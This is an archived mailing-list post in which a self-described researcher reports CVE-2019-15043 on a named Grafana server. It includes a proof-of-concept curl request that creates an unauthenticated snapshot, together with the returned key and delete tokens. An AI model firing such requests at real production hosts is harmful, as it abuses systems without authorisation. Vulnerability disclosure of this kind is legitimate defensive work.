Critical Vulnerability Report
Divya Singh
dgirlwhohacks at gmail.com
Sun Feb 14 17:47:08 UTC 2021
HEY SECURITY TEAM,
I'm Security Researcher
I have found a critical vulnerability at one of your domain that is
cve-2019-15043
which can led to DDOS attack and can make system go down by grafana snapshot
instance
Vuln url: https://grafana.opendev.org/api/snapshots
<https://grafana.quiknode.io/api/snapshots>
POC:
root at kali:/home/kali# curl -s XPOST
https://grafana.opendev.org/api/snapshots -H "Accept: application/json" -H
"Content-Type: application/json" -d '{"dashboard": {}}' | json_pp
{
"deleteKey" : "6mYFALwQmmpImHeKS30XtFw8ogmoHaSm",
"deleteUrl" : "
http://localhost:3000/api/snapshots-delete/6mYFALwQmmpImHeKS30XtFw8ogmoHaSm
",
"key" : "91H6lcVrwiivMuW1H2iAKcUsZwYU2xfO",
"url" : "
http://localhost:3000/dashboard/snapshot/91H6lcVrwiivMuW1H2iAKcUsZwYU2xfO"
}
for more reference - https://aaron-hoffmann.com/blog/cve-2019-15043/
Fix it to latest grafana instance
Best Regards,
Divya Singh - @Dgirlwhohacks
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://lists.opendev.org/pipermail/service-discuss/attachments/20210214/6be5263b/attachment.html>
More information about the service-discuss
mailing list